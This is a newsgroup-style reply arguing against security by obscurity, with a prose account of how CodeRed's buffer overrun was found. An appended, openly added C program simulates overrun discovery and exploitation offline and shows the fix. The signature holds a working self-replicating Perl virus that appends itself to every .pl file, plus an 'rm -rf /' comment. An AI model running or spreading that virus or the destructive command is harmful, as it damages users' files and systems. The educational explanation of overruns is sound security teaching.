Disaster <disaster@disfanfic.net> (she or he) wrote:
[...]
> > So if you see:
> >
> > define f<integer> {x<integer>}
> >   pow {x, 2} + 17 --> y<integer>
> >   x * y --> f
> >
> > define g<integer> {x<string>}
> >   %% push &x
> >   %% call atoi
> >   %% mov &g, @result
> >
> > you exactly know what f and g do.
> 
> Actually! I don't! I don't understand that at all.

Probably you've never seen any programming language at all. Tenchi will
understand both (and be able to say both are useless) even if he only
knows Visual Basic.

> > So there is no point in having a secret programming language: as soon as
> > someone gets some source code written in it, the language is revealed,
> > and if nobody gets source written in it, he only has the description of
> > the language (not even a compiler) and cannot do any harm using it
> > (not more harm than using assembler).
> 
> Then don't let anyone get the source code!

If nobody gets the source code, you can give out the language specs and
receive licensing fees.

But that's the problem: not giving out the language specs does not
increase security. Not giving out the source of your own programs might
increase it - probably it does not, because it is too easy to get it if
you really want it. You just need a good gun...

Look at ID Software. They give out the full source code for Quake 3 for
free. Only the game data files are what you pay for. But it does not do
any harm to ID Software to give out the source since a small group
cannot make a complete game out of it (the data files are the main
work) and the GPL must be inherited.

> > > An evolved entity is still its own entity. That which is derived from C
> > > is no longer C.
> >
> > Therefore C is not C because there are different standards about it:
> > K&R, ANSI C, ANSI C99.
> 
> Well C is C. But something other than C is not C

K&R C is not ANSI C99.

> > > > If you design a new language that is not derived from a current one, you
> > > > won't find programmers learning it.
> > >
> > > Which is a good reason why NERV would use it in the first place.
> >
> > Security by obscurity is no security concept at all. They aren't that
> > stupid.
> 
> It is one concept. It is also a good concept! Sometimes necessary. I don't
> know where you learnt otherwise but go beat the crap out of them.

At least in cryptography it's really true.

- If you have a simple, crackable algorithm and do not tell anyone about
  it, probably someone might be able to guess the algorithm.
- If you have a complicated, uncrackable algorithm, giving it out does
  not do any harm to your security.

In particular, one must never rely on nobody knowing the algorithm, and
that is exactly what security by obscurity is.

But now think about someone finding a bug in your program. If the source
is available, most probably they will send you a patch for it and then
publish the bug with the patch. So everyone (especially the script
kiddies) knows the bug, but every admin can patch his version of the
program to remove the security hole. If the source is unavailable, the
bug will be published anyway - but without a patch. The time during
which script kiddies can exploit it will be longer.

I just found
http://www-106.ibm.com/developerworks/security/library/s-obs.html?dwzone=security
- maybe that interests you.

> > Anyone can read the source of GPG, but did anyone break the encryption?
> > Nobody except MS knows the Internet Explorer source, but there are known
> > security holes?
> 
> Well, what about those people who have stolen the source?

They are not the only ones to find security holes. Most holes are found
by those who have never seen the source - just by trying out some things
in JavaScript.

In particular, CodeRed used an approach that does not require seeing the
source - the source does not even help with it! They just tried putting
very long strings into the URL and saw that the program crashed. Then
they ran the program in a debugger, looked at which memory area was
overwritten, and changed the bytes of the long string so that, at the
place where the code wanted to return, there is a pointer pointing to
some area inside the long string. So they executed their own assembly
code - without needing the IIS source even once. Most buffer overruns
were found by trial and error.

> > > > A big project like MAGI
> > > > cannot be done if the programmers first have to learn a completely new
> > > > programming language.
> > >
> > > Of course it can! You just need to train them in the new language first.
> >
> > That costs too much time.
> 
> They had time!

They could not know when the first Angel would attack.

At least that's how episode 01 sounds.


-- 
#!/usr/bin/perl -- WARNING: Be careful. This is a virus!!! # rm -rf /
eval($0=q{$0="\neval(\$0=q{$0});\n";for(<*.pl>){open X,">>$_";print X
$0;close X;}print''.reverse"\nsuriv lreP trohs rehtona tsuJ>RH<\n"});
####################### http://learn.to/quote #######################
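The trial-and-error overrun hunt described in the message above (long input crashes the program, look in the debugger at which bytes landed in the return slot, then point the return address back into the input), as an added example that is not part of the original post or of CodeRed itself. A real stack frame is replaced by a byte array holding a 32-byte input buffer followed by an 8-byte saved return address, so every step runs offline without corrupting the real stack; BUF_SIZE, ORIGINAL_RET, BUF_ADDR and the 0xCC bytes standing in for attacker code are assumed values for illustration, and the hardened_copy variant shows the one-line length check that closes the hole.

```c
/* Added example, not from the original post: a self-contained model of the
 * trial-and-error buffer-overrun hunt described in the message.  The
 * "frame" is a byte array: a 32-byte input buffer followed by an 8-byte
 * saved return address.  BUF_SIZE, ORIGINAL_RET, BUF_ADDR and the 0xCC
 * "payload" bytes are assumptions for illustration only. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define BUF_SIZE     32                    /* assumed size of the vulnerable buffer */
#define FRAME_SIZE   (BUF_SIZE + 8)        /* buffer + 8-byte saved return address */
#define ORIGINAL_RET 0x0000000000401234ULL /* assumed legitimate return address */
#define BUF_ADDR     0x00007ffd00001000ULL /* assumed run-time address of the buffer */
#define MAX_INPUT    256

struct sim_frame { unsigned char bytes[FRAME_SIZE]; };

/* Read the 8 bytes that sit where the saved return address lives. */
static uint64_t saved_ret(const struct sim_frame *f)
{
    uint64_t v;
    memcpy(&v, f->bytes + BUF_SIZE, sizeof v);
    return v;
}

/* The bug: no length check, so a long input runs past the buffer into the
 * saved return address (capped at FRAME_SIZE only so the model itself stays
 * memory-safe; a real strcpy would keep going). */
static void vulnerable_copy(struct sim_frame *f, const unsigned char *in, size_t len)
{
    uint64_t ret = ORIGINAL_RET;
    memset(f->bytes, 0, FRAME_SIZE);
    memcpy(f->bytes + BUF_SIZE, &ret, sizeof ret);
    memcpy(f->bytes, in, len > FRAME_SIZE ? FRAME_SIZE : len);
}

/* The fix: reject anything that does not fit.  Returns 0 on success and -1
 * on over-long input, and never touches the return address. */
static int hardened_copy(struct sim_frame *f, const unsigned char *in, size_t len)
{
    uint64_t ret = ORIGINAL_RET;
    if (len > BUF_SIZE)
        return -1;
    memset(f->bytes, 0, FRAME_SIZE);
    memcpy(f->bytes + BUF_SIZE, &ret, sizeof ret);
    memcpy(f->bytes, in, len);
    return 0;
}

/* Step 1: feed ever longer strings of 'A' and watch for the "crash", i.e.
 * the saved return address changing.  Returns the shortest input length
 * that corrupts it, or 0 if none up to MAX_INPUT does. */
static size_t find_crash_length(void)
{
    unsigned char in[MAX_INPUT];
    struct sim_frame f;
    size_t len;
    memset(in, 'A', sizeof in);
    for (len = 1; len <= MAX_INPUT; len++) {
        vulnerable_copy(&f, in, len);
        if (saved_ret(&f) != ORIGINAL_RET)
            return len;
    }
    return 0;
}

/* Step 2: the "debugger" step.  Send a pattern with no repeated 8-byte
 * window (byte i == i), read back what landed in the return slot, and find
 * where in the input it came from.  Returns that offset, or -1. */
static int find_ret_offset(void)
{
    unsigned char in[MAX_INPUT];
    struct sim_frame f;
    size_t i;
    for (i = 0; i < MAX_INPUT; i++)
        in[i] = (unsigned char)i;
    vulnerable_copy(&f, in, MAX_INPUT);
    for (i = 0; i + 8 <= MAX_INPUT; i++)
        if (memcmp(in + i, f.bytes + BUF_SIZE, 8) == 0)
            return (int)i;
    return -1;
}

/* Step 3: place a pointer back into the input at the return slot offset.
 * The rest of the input (0xCC here, standing in for attacker code) is what
 * execution would land on.  Returns the value now in the return slot and
 * stores the byte it points at in *landing_byte. */
static uint64_t run_exploit(int ret_offset, unsigned char *landing_byte)
{
    unsigned char in[MAX_INPUT];
    struct sim_frame f;
    uint64_t target = BUF_ADDR;            /* start of the input == start of payload */
    memset(in, 0xCC, sizeof in);
    memcpy(in + ret_offset, &target, sizeof target);
    vulnerable_copy(&f, in, (size_t)ret_offset + 8);
    *landing_byte = f.bytes[saved_ret(&f) - BUF_ADDR];
    return saved_ret(&f);
}

int main(void)
{
    unsigned char landed = 0;
    int off = find_ret_offset();
    printf("shortest crashing input: %zu bytes\n", find_crash_length());
    printf("return address sits at input offset %d\n", off);
    printf("after exploit, return slot = 0x%llx, landing on byte 0x%02x\n",
           (unsigned long long)run_exploit(off, &landed), landed);
    return 0;
}
```

Note that nothing in the hunt needed the "source" of vulnerable_copy: the crash length, the offset of the return slot and the final payload all come from observing behaviour, which is the message's point about CodeRed and IIS.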